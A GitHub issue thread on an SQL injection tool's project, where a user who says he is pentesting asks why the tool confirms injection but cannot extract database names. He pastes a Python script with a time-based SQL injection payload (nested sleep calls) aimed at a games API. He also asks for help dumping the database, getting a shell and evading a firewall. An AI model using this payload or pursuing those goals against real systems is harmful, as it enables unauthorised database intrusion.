-
-
Notifications
You must be signed in to change notification settings - Fork 277
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
How to force to use get methord??? #120
Comments
Currently no support for method forcing so closing this now and later on will reopen once I am free to implement this |
And how about the fetching database name??
Why it exploit and still cant fetching database name or anything.
…On Sat, 30 Dec 2023, 10:59 Nasir Khan, ***@***.***> wrote:
Currently no support for method forcing so closing this now and later on
will reopen once I am free to implement this
—
Reply to this email directly, view it on GitHub
<#120 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/A3AIF65HA5W4PTBU3UVBPJDYL7CW7AVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGQ3TQMJQG4>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
The reasons could be firewall, payload not available in payloads list or a false positive. You should always confirm manually and try find a way to exploit manually then you can use sql-shell to automate your queries |
I also use the sql shell but nothing happen check this
…On Sat, 30 Dec 2023, 11:10 Nasir Khan, ***@***.***> wrote:
The reasons could be firewall, payload not available in payloads list or a
false positive. You should always confirm manually and try find a way to
exploit manually then you can use sql-shell to automate your queries
—
Reply to this email directly, view it on GitHub
<#120 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/A3AIF67IGI2D5JO4O3TGCILYL7EAFAVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGQ4DAMBRGA>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
And i confirm the target is vulnerable by writting a script and the target
is sleep in time i give but can you help me either to use this my script to
get database name!? And shell or anything or to evade firewall??
This is my script
import requests
import time
url = "https://target.com/api/games/markets" payload =
"""(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/"""
parameters = {'games': payload, 'markets': "46%2C52-2.5%2C43"}
start_time = time.time()
response = requests.get(url, params=parameters) end_time =
time.time()
if end_time - start_time > 6:
print("The server is vulnerable to time-based SQL injection.")
else: print("The
server is not vulnerable to time-based SQL injection.")
…On Sat, 30 Dec 2023, 11:15 rajabu daimu, ***@***.***> wrote:
I also use the sql shell but nothing happen check this
On Sat, 30 Dec 2023, 11:10 Nasir Khan, ***@***.***> wrote:
> The reasons could be firewall, payload not available in payloads list or
> a false positive. You should always confirm manually and try find a way to
> exploit manually then you can use sql-shell to automate your queries
>
> —
> Reply to this email directly, view it on GitHub
> <#120 (comment)>,
> or unsubscribe
> <https://github.com/notifications/unsubscribe-auth/A3AIF67IGI2D5JO4O3TGCILYL7EAFAVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGQ4DAMBRGA>
> .
> You are receiving this because you authored the thread.Message ID:
> ***@***.***>
>
|
Is this sort of pentest or a bug bounty target? |
Pentest!
…On Sat, 30 Dec 2023, 11:28 Nasir Khan, ***@***.***> wrote:
Is this sort of pentest or a bug bounty target?
—
Reply to this email directly, view it on GitHub
<#120 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/A3AIF6YOFL4HSLFH2G536G3YL7GBDAVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGQ4DENBZGY>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
Email me: |
Thanks bro.
Will waiting for your reply
…On Sat, 30 Dec 2023, 15:50 Nasir Khan, ***@***.***> wrote:
Email me: ***@***.*** I will check and let you know of the
results
—
Reply to this email directly, view it on GitHub
<#120 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/A3AIF67IA6BJX6P5AACEQK3YMAEZ7AVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGUZDEMRRGY>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>
|
Uts have been a long now am just waiting for your help
…On Sun, 31 Dec 2023, 22:48 rajabu daimu, ***@***.***> wrote:
Hey am still waiting for your help bro
On Sat, 30 Dec 2023, 18:55 rajabu daimu, ***@***.***> wrote:
> Thanks bro.
> Will waiting for your reply
>
> On Sat, 30 Dec 2023, 15:50 Nasir Khan, ***@***.***> wrote:
>
>> Email me: ***@***.*** I will check and let you know of the
>> results
>>
>> —
>> Reply to this email directly, view it on GitHub
>> <#120 (comment)>,
>> or unsubscribe
>> <https://github.com/notifications/unsubscribe-auth/A3AIF67IA6BJX6P5AACEQK3YMAEZ7AVCNFSM6AAAAABBEB4TMCVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTQNZSGUZDEMRRGY>
>> .
>> You are receiving this because you authored the thread.Message ID:
>> ***@***.***>
>>
>
|
i was waiting for your email and i didn't received one, how am i suppose to help in such case? |
Is your feature request related to a problem? Please describe.
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
Describe the solution you'd like
A clear and concise description of what you want to happen.
Describe alternatives you've considered
A clear and concise description of any alternative solutions or features you've considered.
Additional context
Add any other context or screenshots about the feature request here.
The text was updated successfully, but these errors were encountered: